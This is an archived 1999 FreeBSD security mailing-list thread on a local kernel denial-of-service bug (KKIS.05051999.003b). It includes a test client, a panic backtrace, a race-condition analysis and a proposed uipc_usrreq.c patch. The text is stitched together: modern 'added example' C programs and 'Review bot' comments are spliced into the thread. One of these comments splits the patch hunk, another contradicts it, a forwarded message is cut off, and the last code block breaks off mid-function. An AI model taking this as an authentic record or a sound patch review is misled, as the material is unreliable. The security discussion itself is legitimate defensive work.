From owner-freebsd-security Sat May 8 20:26:17 1999
Delivered-To: freebsd-security@freebsd.org
Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 14D1A156B5 for ; Sat, 8 May 1999 20:26:15 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id UAA09528; Sat, 8 May 1999 20:26:09 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com)
Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id UAA14975; Sat, 8 May 1999 20:26:07 -0700 (PDT)
Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id UAA19750; Sat, 8 May 1999 20:26:06 -0700 (PDT)
From: Don Lewis
Message-Id: <199905090326.UAA19750@salsa.gv.tsc.tdk.com>
Date: Sat, 8 May 1999 20:26:05 -0700
In-Reply-To: Wes Peters "Re: KKIS.05051999.003b" (May 7, 11:34pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Wes Peters, Don Lewis
Subject: Re: KKIS.05051999.003b
Cc: Kevin Day, security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On May 7, 11:34pm, Wes Peters wrote:
} Subject: Re: KKIS.05051999.003b
} Don Lewis wrote:
} >
} > On May 6, 2:10pm, Kevin Day wrote:
} > }
} > } Here's my testing so far:
} > }
} > } 2.2.2 - Vulnerable
} > } 2.2.6 - Vulnerable
} > } 2.2.8 - Vulnerable
} > } 3.1-RELEASE - Ran 15 minutes, no crash.
}
} Let it keep running.  It will (apparently) eventually exhaust all
} available file handles in an unrecoverable manner.  3.1-R is better,
} but not invulnerable.

I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
something.  The exploit code should not result in any calls to unp_gc(),
because the client receives all the descriptors that are sent by the server.
This should result in unp_rights being 0 except when the descriptor is
in flight.  If unp_rights is 0 when the socket is closed, unp_gc() should not
be called.  unp_gc() should only be called if the client closes the socket
before receiving the descriptor.

Maybe a third process occasionally gets scheduled while the exploit code
has the descriptor in flight and causes unp_gc() to get executed.  If so,
then the exploit shouldn't cause a problem in single user mode.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

Message-ID: <37350D57.C21154@softweyr.com>
Date: Sat, 08 May 1999 22:21:43 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Don Lewis
Cc: Kevin Day, security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b
References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com>

Don Lewis wrote:
>
> On May 7, 11:34pm, Wes Peters wrote:
> } Subject: Re: KKIS.05051999.003b
> } Don Lewis wrote:
> } >
> } > On May 6, 2:10pm, Kevin Day wrote:
> } > }
> } > } Here's my testing so far:
> } > }
> } > } 2.2.2 - Vulnerable
> } > } 2.2.6 - Vulnerable
> } > } 2.2.8 - Vulnerable
> } > } 3.1-RELEASE - Ran 15 minutes, no crash.
> }
> } Let it keep running.  It will (apparently) eventually exhaust all
> } available file handles in an unrecoverable manner.  3.1-R is better,
> } but not invulnerable.
>
> I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
> panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
> something.  The exploit code should not result in any calls to unp_gc(),
> because the client receives all the descriptors that are sent by the server.

Actually it doesn't.  If you look up the first message I posted on this
subject, I listed the error messages it produces, many of which indicated
the client didn't get a descriptor from the server IIRC.  Maybe that's
how the descriptors are being lost; they've been sent on a UNIX domain
socket and so have to remain open, have been closed by the server, working
around its limits, and have not been read by the client?

> This should result in unp_rights being 0 except when the descriptor is
> in flight.  If unp_rights is 0 when the socket is closed, unp_gc() should not
> be called.  unp_gc() should only be called if the client closes the socket
> before receiving the descriptor.
>
> Maybe a third process occasionally gets scheduled while the exploit code
> has the descriptor in flight and causes unp_gc() to get executed.  If so,
> then the exploit shouldn't cause a problem in single user mode.

I haven't had time to research this any further, I spent today chasing
a VERY energetic toddler.  I'm too old for this.  ;^)

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
http://www.softweyr.com/~softweyr                      wes@softweyr.com

To: Don.Lewis@tsc.tdk.com
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b
From: sthaug@nethelp.no
In-Reply-To: Your message of "Sat, 8 May 1999 20:26:05 -0700"
References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com>
Date: Sun, 09 May 1999 11:29:52 +0200
Message-ID: <65139.926242192@verdi.nethelp.no>

> Maybe a third process occasionally gets scheduled while the exploit code
> has the descriptor in flight and causes unp_gc() to get executed.  If so,
> then the exploit shouldn't cause a problem in single user mode.

It happens in single user mode too.

In general, this program leaks one file descriptor for each time round
the client/server loops - this is easy to see if you add some debugging
printout to falloc()/ffree() in sys/kern/kern_descrip.c.

If you parametrize the client loop, ie.

    case 0:
        for (n=0;n

    #include <sys/types.h>
    #include <sys/socket.h>
    #include <sys/un.h>
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    #define PATH_TMP "/tmp/123.tmp"

    int
    main(void)
    {
        struct sockaddr_un addr_c;
        struct msghdr mymsghdr;
        int sockfd, l;

        if ((sockfd = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1)
            perror("socket");

        /* Bind the datagram socket to a path in /tmp. */
        strcpy(addr_c.sun_path, PATH_TMP);
        addr_c.sun_len = sizeof(addr_c.sun_len) + sizeof(addr_c.sun_family) +
            strlen(addr_c.sun_path) + 1;
        addr_c.sun_family = AF_UNIX;
        if (bind(sockfd, (struct sockaddr *) &addr_c, addr_c.sun_len) == -1)
            perror("bind");

        /* Ask for a message with no data buffer and no control buffer. */
        mymsghdr.msg_name = NULL;
        mymsghdr.msg_namelen = 0;
        mymsghdr.msg_iov = NULL;
        mymsghdr.msg_iovlen = 0;
        mymsghdr.msg_control = NULL;
        mymsghdr.msg_controllen = 0;
        mymsghdr.msg_flags = 0;

        if ((l = recvmsg(sockfd, &mymsghdr, 0)) == -1)
            perror("recvmsg");
        else
            printf("client: received len %d\n", l);

        close(sockfd);
        if (unlink(PATH_TMP) == -1)
            perror("unlink");
        return 0;
    }

To: Don.Lewis@tsc.tdk.com
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b
From: sthaug@nethelp.no
In-Reply-To: Your message of "Sat, 8 May 1999 20:26:05 -0700"
References: <199905090326.UAA19750@salsa.gv.tsc.tdk.com>
Date: Sun, 09 May 1999 13:17:01 +0200
Message-ID: <66148.926248621@verdi.nethelp.no>

> I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
> panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
> something.

A 2.2.8 system I have here panics in sorflush (called from unp_gc()):

    void
    sorflush(so)
        register struct socket *so;
    {
        register struct sockbuf *sb = &so->so_rcv;
        register struct protosw *pr = so->so_proto;
        register int s;
        struct sockbuf asb;

        sb->sb_flags |= SB_NOINTR;
        (void) sblock(sb, M_WAITOK);
        s = splimp();
        socantrcvmore(so);
        sbunlock(sb);
        asb = *sb;
        bzero((caddr_t)sb, sizeof (*sb));
        splx(s);
        /* faults here: pr is NULL when so->so_proto is 0 */
        if (pr->pr_flags & PR_RIGHTS && pr->pr_domain->dom_dispose)
            (*pr->pr_domain->dom_dispose)(asb.sb_mb);
        sbrelease(&asb);
    }

because so->so_proto is 0.
Backtrace:

#0  boot (howto=256) at ../../kern/kern_shutdown.c:275
#1  0xf01128ba in panic (fmt=0xf01bdf0f "page fault") at ../../kern/kern_shutdown.c:409
#2  0xf01beafa in trap_fatal (frame=0xefbffde4) at ../../i386/i386/trap.c:772
#3  0xf01be5bc in trap_pfault (frame=0xefbffde4, usermode=0) at ../../i386/i386/trap.c:681
#4  0xf01be247 in trap (frame={tf_es = 16, tf_ds = 16, tf_edi = -272630184, tf_esi = -260321820, tf_ebp = -272630184, tf_isp = -272630260, tf_ebx = -260321856, tf_edx = 1073610751, tf_ecx = 0, tf_eax = 0, tf_trapno = 12, tf_err = 0, tf_eip = -267232200, tf_cs = 8, tf_eflags = 66118, tf_esp = 0, tf_ss = -259461120}) at ../../i386/i386/trap.c:324
#5  0xf0125c38 in sorflush (so=0xf07bcd80) at ../../kern/uipc_socket.c:854
#6  0xf01297de in unp_gc () at ../../kern/uipc_usrreq.c:889
#7  0xf012908f in unp_detach (unp=0xf0548694) at ../../kern/uipc_usrreq.c:420
#8  0xf0128b42 in uipc_usrreq (so=0xf0890f00, req=1, m=0x0, nam=0x0, control=0x0) at ../../kern/uipc_usrreq.c:113
#9  0xf012720f in old_detach (so=0xf0890f00) at ../../kern/uipc_socket2.c:890
#10 0xf0124902 in soclose (so=0xf0890f00) at ../../kern/uipc_socket.c:209
#11 0xf011c607 in soo_close (fp=0xf0906540, p=0xf07d8800) at ../../kern/sys_socket.c:206
#12 0xf010b1bc in closef (fp=0xf0906540, p=0xf07d8800) at ../../kern/kern_descrip.c:896
#13 0xf010a8a9 in close (p=0xf07d8800, uap=0xefbfff94, retval=0xefbfff84) at ../../kern/kern_descrip.c:392
#14 0xf01bed93 in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0, tf_esi = -272638692, tf_ebp = -272638740, tf_isp = -272629788, tf_ebx = -272638688, tf_edx = -272638846, tf_ecx = -272638972, tf_eax = 6, tf_trapno = 7, tf_err = 7, tf_eip = 537330913, tf_cs = 31, tf_eflags = 646, tf_esp = -272639024, tf_ss = 39}) at ../../i386/i386/trap.c:920
#15 0x200704e1 in ?? ()
#16 0x163d in ?? ()
#17 0x1095 in ?? ()

Steinar Haug, Nethelp consulting, sthaug@nethelp.no
From: Don Lewis
Message-Id: <199905091240.FAA20619@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 05:40:27 -0700
In-Reply-To: Wes Peters "Re: KKIS.05051999.003b" (May 8, 10:21pm)
To: Wes Peters, Don Lewis
Subject: Re: KKIS.05051999.003b
Cc: Kevin Day, security@FreeBSD.ORG

On May 8, 10:21pm, Wes Peters wrote:
} Subject: Re: KKIS.05051999.003b
} Don Lewis wrote:
} > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
} > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
} > something.  The exploit code should not result in any calls to unp_gc(),
} > because the client receives all the descriptors that are sent by the server.
}
} Actually it doesn't.  If you look up the first message I posted on this
} subject, I listed the error messages it produces, many of which indicated
} the client didn't get a descriptor from the server IIRC.  Maybe that's
} how the descriptors are being lost; they've been sent on a UNIX domain
} socket and so have to remain open, have been closed by the server, working
} around its limits, and have not been read by the client?

I think all those messages are the result of running out of descriptors.
If no more descriptors can be created, then socket() will fail with ENFILE
(23), and bind(), sendto(), and recvmsg() will fail with EBADF (9), and
unlink() will fail with ENOENT (2).  I'd have to study the code some more
to work out the expected sequence of the errors assuming that no more
descriptors could be created.

The message containing the descriptor to be passed holds a reference to
the descriptor, so it is permissible for the server to close the descriptor
before the client receives the message.  See unp_internalize() and
unp_externalize().

BTW, how does this manage to work on the Alpha, where
sizeof(int) != sizeof(pointer)?
From: Don Lewis
Message-Id: <199905091244.FAA20637@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 05:44:57 -0700
In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 1:17pm)
To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com
Subject: Re: KKIS.05051999.003b
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG

On May 9, 1:17pm, sthaug@nethelp.no wrote:
} Subject: Re: KKIS.05051999.003b
} > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
} > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
} > something.
}
} A 2.2.8 system I have here panics in sorflush (called from unp_gc()):

This is the bug that Matt Dillon fixed just before 3.1-RELEASE.  sorflush()
is only supposed to be used on descriptors associated with sockets.  This
exploit code causes sorflush() to be called on a descriptor for an open file.
From: Don Lewis
Message-Id: <199905091308.GAA20692@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 06:08:49 -0700
In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 11:29am)
To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com
Subject: Re: KKIS.05051999.003b
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG

On May 9, 11:29am, sthaug@nethelp.no wrote:
} Subject: Re: KKIS.05051999.003b
} > Maybe a third process occasionally gets scheduled while the exploit code
} > has the descriptor in flight and causes unp_gc() to get executed.  If so,
} > then the exploit shouldn't cause a problem in single user mode.
}
} It happens in single user mode too.
}
} In general, this program leaks one file descriptor for each time round
} the client/server loops - this is easy to see if you add some debugging
} printout to falloc()/ffree() in sys/kern/kern_descrip.c.
}
} If you parametrize the client loop, ie.
}
} case 0:
}     for (n=0;n

To: Don.Lewis@tsc.tdk.com
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG
Subject: Re: KKIS.05051999.003b
From: sthaug@nethelp.no
In-Reply-To: Your message of "Sun, 9 May 1999 06:08:49 -0700"
References: <199905091308.GAA20692@salsa.gv.tsc.tdk.com>
Date: Sun, 09 May 1999 15:13:34 +0200
Message-ID: <66937.926255614@verdi.nethelp.no>

> } - The client is asking for messages with zero iov's, and length 0.  To
> } me, this means it shouldn't receive *anything* (file descriptors or
> } otherwise).  But the program included below, slightly modified from the
> } client() routine, receives one message of length zero.  The same thing
> } happens on for instance NetBSD 1.4-BETA or NetBSD 1.3.2.  Does this mean
> } the semantics of receiving zero length messages aren't sufficiently
> } well defined?
>
> I believe the length refers to the length of any data that might
> accompany the descriptors.  It should be OK to specify a length of 0.
> Even if the server was sending data in its reply, I believe it would
> not be an error to specify a zero length buffer.  The data would just
> be truncated to fit the buffer size.

Okay, but why should the *standalone* version of the client receive any
message at all (which it does: a zero length message) when there's no
sender involved at all?
Steinar Haug, Nethelp consulting, sthaug@nethelp.no
From: Don Lewis
Message-Id: <199905091348.GAA20785@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 06:48:37 -0700
In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 3:13pm)
To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com
Subject: Re: KKIS.05051999.003b
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG

On May 9, 3:13pm, sthaug@nethelp.no wrote:
} Subject: Re: KKIS.05051999.003b
} > } - The client is asking for messages with zero iov's, and length 0.  To
} > } me, this means it shouldn't receive *anything* (file descriptors or
} > } otherwise).  But the program included below, slightly modified from the
} > } client() routine, receives one message of length zero.  The same thing
} > } happens on for instance NetBSD 1.4-BETA or NetBSD 1.3.2.  Does this mean
} > } the semantics of receiving zero length messages aren't sufficiently
} > } well defined?
} >
} > I believe the length refers to the length of any data that might
} > accompany the descriptors.  It should be OK to specify a length of 0.
} > Even if the server was sending data in its reply, I believe it would
} > not be an error to specify a zero length buffer.  The data would just
} > be truncated to fit the buffer size.
}
} Okay, but why should the *standalone* version of the client receive any
} message at all (which it does: a zero length message) when there's no
} sender involved at all?

Darned if I know.  Maybe it is because neither a data buffer nor a control
buffer is specified in your modified version.  If you modify your example
code to loop on recvmsg(), you'll find that recvmsg() will return 0 as many
times as you want.

FLASH!  Now this is really weird.  The original exploit code doesn't show
any signs of leaking descriptors on one of our 3.1-stable machines, but
/tmp (where the sockets are created) is mfs.
If I change PATH and PATH_TMP so that they point to /var/tmp, sendmsg()
fails with ECONNREFUSED after the first iteration and descriptors are
leaked.

I might believe that descriptors could be leaked if sendmsg() fails this
way, but why would sendmsg() fail if the sockets live in a ufs filesystem
but not if the sockets live in a mfs filesystem?
From: Don Lewis
Message-Id: <199905091406.HAA20815@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 07:06:07 -0700
In-Reply-To: Don Lewis "Re: KKIS.05051999.003b" (May 9, 6:48am)
To: Don Lewis, sthaug@nethelp.no
Subject: Re: KKIS.05051999.003b
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG

On May 9, 6:48am, Don Lewis wrote:
} Subject: Re: KKIS.05051999.003b
} FLASH!  Now this is really weird.  The original exploit code doesn't show
} any signs of leaking descriptors on one of our 3.1-stable machines, but
} /tmp (where the sockets are created) is mfs.  If I change PATH and
} PATH_TMP so that they point to /var/tmp, sendmsg() fails with
} ECONNREFUSED after the first iteration and descriptors are leaked.
}
} I might believe that descriptors could be leaked if sendmsg() fails this
} way, but why would sendmsg() fail if the sockets live in a ufs filesystem
} but not if the sockets live in a mfs filesystem?

Ok, the first bug is in uipc_send().  If an error occurs between
unp_internalize() and release:, then the work that unp_internalize() did
needs to be undone.  Probably something like:

    if (control && error != 0)
        unp_dispose(control);

right before release: would do the trick.

I haven't a clue about what appears to be bug number 2.
From: Don Lewis
Message-Id: <199905091428.HAA20849@salsa.gv.tsc.tdk.com>
Date: Sun, 9 May 1999 07:28:06 -0700
In-Reply-To: sthaug@nethelp.no "Re: KKIS.05051999.003b" (May 9, 3:13pm)
To: sthaug@nethelp.no, Don.Lewis@tsc.tdk.com
Subject: Re: KKIS.05051999.003b
Cc: wes@softweyr.com, toasty@HOME.DRAGONDATA.COM, security@FreeBSD.ORG

On May 9, 3:13pm, sthaug@nethelp.no wrote:
} Subject: Re: KKIS.05051999.003b
} Okay, but why should the *standalone* version of the client receive any
} message at all (which it does: a zero length message) when there's no
} sender involved at all?

I think this is part of bug number 2.  What appears to be happening is
that the client does sendto() and then does recvmsg() which returns, and
then the client continues on to do the next unlink() before the server
wakes up and does its sendmsg().  When the server finally gets around to
executing sendmsg(), the client has already unlinked the socket that the
server is trying to send its reply to, causing the sendmsg() to fail and
leak the descriptor that is being passed.  The UFS vs MFS effect that I
observed apparently affects the timing.

If I add a sleep() call in the client before the recvmsg(), everything
works as it should.
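The descriptor-passing round trip done so that the client cannot run ahead of the server (it blocks in recvmsg() until the reply is actually queued, so nothing is left in flight when the socket is closed), written here as an added example rather than code from the thread or from FreeBSD; it also counts the process's open descriptors before and after, the userland stand-in for the falloc()/ffree() printout suggested earlier. The helper names, the socketpair()/fork() harness and the Linux target are this example's own assumptions.

```c
/* Added example, not code from the thread or FreeBSD: SCM_RIGHTS passing over
 * an AF_UNIX datagram socketpair done so the receiver cannot run ahead of the
 * sender, plus an open-descriptor count that proves nothing leaked. Helper
 * names and the fork() harness are this example's own (written for Linux). */
#define _GNU_SOURCE 1
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

/* Ancillary-data buffer with room for exactly one passed descriptor. */
union rights_buf { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; };

/* Open descriptors in this process: userland stand-in for falloc()/ffree(). */
int count_open_fds(void)
{
    int n = 0;
    for (int fd = 0; fd < 1024; fd++)
        n += fcntl(fd, F_GETFD) != -1;
    return n;
}

/* One-byte data buffer plus rights buffer; the data byte is what makes
 * recvmsg() wait for a real message instead of returning 0 immediately. */
static void setup_msg(struct msghdr *msg, struct iovec *iov, char *byte,
                      union rights_buf *u)
{
    memset(msg, 0, sizeof *msg);
    memset(u, 0, sizeof *u);
    iov->iov_base = byte;
    iov->iov_len = 1;
    msg->msg_iov = iov;
    msg->msg_iovlen = 1;
    msg->msg_control = u->buf;
    msg->msg_controllen = sizeof u->buf;
}

/* Pass one descriptor; the queued message keeps its own reference to it. */
int send_fd(int sock, int fd_to_pass)
{
    char byte = 'F';
    struct iovec iov; union rights_buf u; struct msghdr msg;
    struct cmsghdr *cm;
    setup_msg(&msg, &iov, &byte, &u);
    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd_to_pass, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one passed descriptor; -1 on error or truncated rights (MSG_CTRUNC),
 * which the thread's client, having supplied no control buffer, cannot see. */
int recv_fd(int sock)
{
    char byte;
    struct iovec iov; union rights_buf u; struct msghdr msg;
    int fd = -1;
    setup_msg(&msg, &iov, &byte, &u);
    if (recvmsg(sock, &msg, 0) != 1 || (msg.msg_flags & MSG_CTRUNC))
        return -1;
    for (struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm != NULL;
         cm = CMSG_NXTHDR(&msg, cm))
        if (cm->cmsg_level == SOL_SOCKET && cm->cmsg_type == SCM_RIGHTS)
            memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

/* Harness: child ("server") passes a pipe's write end, parent ("client") writes
 * one byte through it and reads it back. Returns 0, or the failing step number;
 * 5 means the parent ended with more descriptors open than it started with. */
int fd_passing_roundtrip(void)
{
    int sv[2], pipefd[2], before = count_open_fds(), passed = -1;
    char c = 0; pid_t pid;
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) == -1) return 1;
    if (pipe(pipefd) == -1) return 2;
    if ((pid = fork()) == -1) return 3;
    if (pid == 0) {
        int rc = send_fd(sv[1], pipefd[1]);
        close(pipefd[1]);               /* safe: the message still holds it */
        _exit(rc == 0 ? 0 : 1);
    }
    close(sv[1]); close(pipefd[1]);     /* only the passed copy can write now */
    passed = recv_fd(sv[0]);
    if (passed != -1 && write(passed, "x", 1) == 1 && read(pipefd[0], &c, 1) != 1)
        c = 0;
    if (passed != -1) close(passed);
    close(sv[0]); close(pipefd[0]);
    waitpid(pid, NULL, 0);
    if (passed == -1 || c != 'x') return 4;
    return count_open_fds() == before ? 0 : 5;
}

int main(void) { return fd_passing_roundtrip(); }
```

Build with cc and run; the exit status is 0 when the byte came back through the passed descriptor and the descriptor count is unchanged.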
From: Don Lewis
Message-Id: <199905101406.HAA23383@salsa.gv.tsc.tdk.com>
Date: Mon, 10 May 1999 07:06:05 -0700
In-Reply-To: Don Lewis "Re: KKIS.05051999.003b" (May 9, 5:40am)
To: Don Lewis, Wes Peters
Subject: Re: KKIS.05051999.003b
Cc: Kevin Day, security@FreeBSD.ORG

On May 9, 5:40am, Don Lewis wrote:
} Subject: Re: KKIS.05051999.003b
} On May 8, 10:21pm, Wes Peters wrote:
} } Subject: Re: KKIS.05051999.003b
} } Don Lewis wrote:
} } } > I don't see any obvious descriptor leaks, but the fact that FreeBSD < 3.1
} } } > panics (probably in unp_gc(), which Matt fixed) indicates that I'm missing
} } } > something.  The exploit code should not result in any calls to unp_gc(),
} } } > because the client receives all the descriptors that are sent by the server.
} } }
} } } Actually it doesn't.  If you look up the first message I posted on this
} } } subject, I listed the error messages it produces, many of which indicated
} } } the client didn't get a descriptor from the server IIRC.

] On my 3.1-RELEASE system it reports numerous sendmsg ECONNREFUSED and
] ENOENTs, then eventually dives into repeats of:
]
] unlink error 2
] bind error 9
] sento error 9
] recvmsg error 9
] socket error 23

Steinar Haug noticed something odd in the exploit code - the client
process doesn't block in recvmsg() like one would expect.  If a message
is waiting, the client process will receive it, but if not, the client
will fall through the recvmsg() without getting an error indication.
This means that the client and server don't run in lockstep.  With the
default UFS mount options for /tmp, the client process will block for
short periods of time while it executes bind() and unlink().  If /tmp is
MFS or is mounted async or with softupdates, the client process will
probably only block when its scheduling quantum expires.
This oddity may allow multiple requests to accumulate for the server
process, and allows the server process to attempt to send responses at
possibly inconvenient times for the client.

If the server calls sendmsg() between the client's bind() and recvmsg()
syscalls, then everything works normally.

If the server calls sendmsg() between the client's recvmsg() and
close(sockfd) syscalls, or if the server manages to do more than one
sendmsg() call during one iteration of the client, which might happen if
the client exhausts its scheduling time quantum, one or more messages
will be outstanding when the client executes close(sockfd).  This will
result in unp_gc() being called to garbage collect the descriptors that
are in flight.  In FreeBSD < 3.1-RELEASE, this will result in a panic due
to sorflush() being improperly called on a non-socket descriptor.

If the server calls sendmsg() after the client's close(sockfd) and before
the client unlinks the socket, the sendmsg() call will fail with
ECONNREFUSED.  If the server calls sendmsg() after the client unlinks the
socket and before the client calls bind(), then the sendmsg() will fail
with ENOENT.  Either of these failures will cause the descriptor being
sent to be permanently leaked away.  The rate at which descriptors are
leaked depends on how the client and server processes are scheduled.

Once enough descriptors have been leaked away, the client's socket()
syscall will fail with ENFILE, the bind(), sendto(), and recvmsg()
syscalls will fail with EBADF because the socket was not created, and
unlink() will fail because the socket name was not created by bind().

The following patch appears to fix the descriptor leak.  I hope to commit
it later today.

Index: uipc_usrreq.c
===================================================================
RCS file: /home/ncvs/src/sys/kern/uipc_usrreq.c,v
retrieving revision 1.43
diff -u -u -r1.43 uipc_usrreq.c
--- uipc_usrreq.c	1999/04/28 11:37:07	1.43
+++ uipc_usrreq.c	1999/05/09 23:50:45
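Review bot: in the @@ -367,6 +367,9 @@ hunk the new "if (control && error != 0) unp_dispose(control);" sits immediately above the "release:" label, so it only runs for error paths that fall through to that point; any path that reaches release: by a direct goto, or that leaves the routine by an earlier break after unp_internalize() has already taken its references, still skips the cleanup and leaks the passed descriptors exactly as before. Worth confirming that the ECONNREFUSED and ENOENT failures described in the message both arrive at the new check, and a short comment on the added lines saying that unp_dispose() releases the references unp_internalize() took would spare the next reader a trip through uipc_usrreq.c.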
@@ -367,6 +367,9 @@ unp_shutdown(unp); } + if (control && error != 0) + unp_dispose(control); + release: if (control) m_freem(control); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 10 17:54:26 1999 Delivered-To: freebsd-security@freebsd.org Received: from loki.iss.net (loki.iss.net [208.21.0.3]) by hub.freebsd.org (Postfix) with ESMTP id E738C15537 for ; Mon, 10 May 1999 17:54:19 -0700 (PDT) (envelope-from rmooney@iss.net) Received: from arden.iss.net (IDENT:rmooney@arden.iss.net [208.21.0.8]) by loki.iss.net (8.9.3/8.9.3) with SMTP id UAA28991 for ; Mon, 10 May 1999 20:52:46 -0400 Date: Mon, 10 May 1999 20:54:21 -0400 (EDT) From: Robert Mooney To: security@freebsd.org Subject: ISS on FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is not an attempt at spam. I'm on this list, and use FreeBSD at home and in the office. This is also not endorsed by ISS. I doubt they will take any responsibility for the product when modified as suggested below. Flames can be directed to /dev/null. ---------- Forwarded message ---------- Date: Mon, 10 May 1999 20:22:48 -0400 (EDT) 
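Review bot: in the uipc_usrreq.c hunk the new `if (control && error != 0) unp_dispose(control);` sits above the `release:` label rather than under it, so any `goto release` from earlier in the function (the label exists for exactly that) still reaches `m_freem(control)` without disposing of the descriptors the control mbuf carries. Either move the guarded unp_dispose() call below the label, or add a comment at the check stating why the early exits can never arrive with internalized rights. The same comment should say what `error != 0` guarantees here: the rights were never appended to the receiver's buffer, so discarding them cannot double-close a descriptor the peer already holds.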
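The descriptor-in-flight mechanics that Don Lewis's analysis turns on, as an added example that is not part of the original thread and not FreeBSD code: a sender hands a pipe's read end across an AF_UNIX datagram socketpair with SCM_RIGHTS and closes its own copy, the receiver blocks in recvmsg() (the exploit's client did not) and checks the control message before trusting it, and a second function reproduces the case the patch is about, where the receiving socket is closed with the message unread and the kernel has to drop the orphaned reference itself. The socketpair, the pipe and the "hello" payload are constructed for the example; the EPIPE check in the second function assumes Linux, where the orphaned descriptor is released before close() returns (FreeBSD's unp_gc() runs asynchronously, so that check could race there).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* One descriptor's worth of ancillary space, aligned as cmsghdr requires. */
union fdcmsg { struct cmsghdr hdr; char buf[CMSG_SPACE(sizeof(int))]; };

/* Send fd as SCM_RIGHTS. A one-byte payload rides along because a datagram
 * carrying only ancillary data is not portable. Returns 0 or -1. */
int send_fd(int sock, int fd)
{
    char payload = 'F';
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union fdcmsg u;
    struct msghdr msg;
    struct cmsghdr *cm;

    memset(&u, 0, sizeof u);
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
    msg.msg_controllen = sizeof u.buf;
    cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof fd);
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Block in recvmsg() until a message is queued (the exploit's client fell
 * through instead, letting messages pile up), then accept exactly one
 * untruncated SCM_RIGHTS descriptor. Returns the new descriptor or -1. */
int recv_fd(int sock)
{
    char payload;
    struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
    union fdcmsg u;
    struct msghdr msg;
    struct cmsghdr *cm;
    int fd;

    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = u.buf;
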